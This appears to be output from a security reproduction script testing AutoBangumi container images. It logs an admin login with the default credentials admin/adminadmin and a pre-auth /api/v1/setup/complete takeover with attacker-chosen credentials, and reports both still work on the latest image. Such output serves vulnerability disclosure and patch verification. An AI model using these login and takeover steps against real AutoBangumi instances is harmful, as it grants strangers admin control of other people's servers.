[*] Pulling images
pull ghcr.io/estrellaxd/auto_bangumi:3.2.6
pull ghcr.io/estrellaxd/auto_bangumi:latest
pull ghcr.io/estrellaxd/auto_bangumi:3.3.0-beta.2

========== [VULNERABLE 3.2.6] ghcr.io/estrellaxd/auto_bangumi:3.2.6 — default-creds bypass test ==========
image VERSION = 3.2.6
[+] startup seeded default admin user (add_default_user)
no-auth GET /api/v1/rss -> 401 (401 = DEV bypass NOT active)
POST /api/v1/auth/login admin/adminadmin
[+] VULNERABLE 3.2.6: default-cred LOGIN SUCCEEDED (200 + admin JWT)
GET /api/v1/rss with JWT cookie -> 200
[+] VULNERABLE 3.2.6: ADMIN ACCESS CONFIRMED (/api/v1/rss 200)

========== [FIXED/LATEST (:latest=3.2.8)] ghcr.io/estrellaxd/auto_bangumi:latest — default-creds bypass test ==========
image VERSION = 3.2.8
[+] startup seeded default admin user (add_default_user)
no-auth GET /api/v1/rss -> 401 (401 = DEV bypass NOT active)
POST /api/v1/auth/login admin/adminadmin
[+] FIXED/LATEST (:latest=3.2.8): default-cred LOGIN SUCCEEDED (200 + admin JWT)
GET /api/v1/rss with JWT cookie -> 200
[+] FIXED/LATEST (:latest=3.2.8): ADMIN ACCESS CONFIRMED (/api/v1/rss 200)

========== [LATEST BETA 3.3.0-beta.2] ghcr.io/estrellaxd/auto_bangumi:3.3.0-beta.2 — default-creds bypass test ==========
image VERSION = 3.3.0-beta.2
[+] startup seeded default admin user (add_default_user)
no-auth GET /api/v1/rss -> 401 (401 = DEV bypass NOT active)
POST /api/v1/auth/login admin/adminadmin
[+] LATEST BETA 3.3.0-beta.2: default-cred LOGIN SUCCEEDED (200 + admin JWT)
GET /api/v1/rss with JWT cookie -> 200
[+] LATEST BETA 3.3.0-beta.2: ADMIN ACCESS CONFIRMED (/api/v1/rss 200)

========== [FIXED/LATEST (:latest=3.2.8)] ghcr.io/estrellaxd/auto_bangumi:latest — /setup/complete pre-auth takeover (Variant 2) ==========
image VERSION = 3.2.8
GET /api/v1/setup/status (pre-auth) -> 200 body={"need_setup":true,"version":"3.2.8"}
POST /api/v1/setup/complete (pre-auth, attacker creds) -> 200
POST /api/v1/auth/login pwned/pwnedpw1 -> 200
GET /api/v1/rss with attacker JWT -> 200
POST /api/v1/auth/login admin/adminadmin (post-takeover) -> 401
[+] FIXED/LATEST (:latest=3.2.8): VARIANT 2 CONFIRMED — pre-auth /setup/complete -> attacker admin takeover

================ VARIANT SUMMARY ================
VARIANT 1 (default-creds bypass): vuln_login=1 vuln_admin=1 (ver=3.2.6) | latest_login=1 latest_admin=1 (ver=3.2.8) | beta_login=1 (ver=3.3.0-beta.2)
VARIANT 2 (/setup/complete pre-auth takeover): setup_takeover=1 (ver=3.2.8)
RULE-OUT: DEV_AUTH_BYPASS active=0 (0 = not active in official images, as expected)
[===] BYPASS/CONFIRMED: variant(s) reproduced on the FIXED/LATEST AutoBangumi image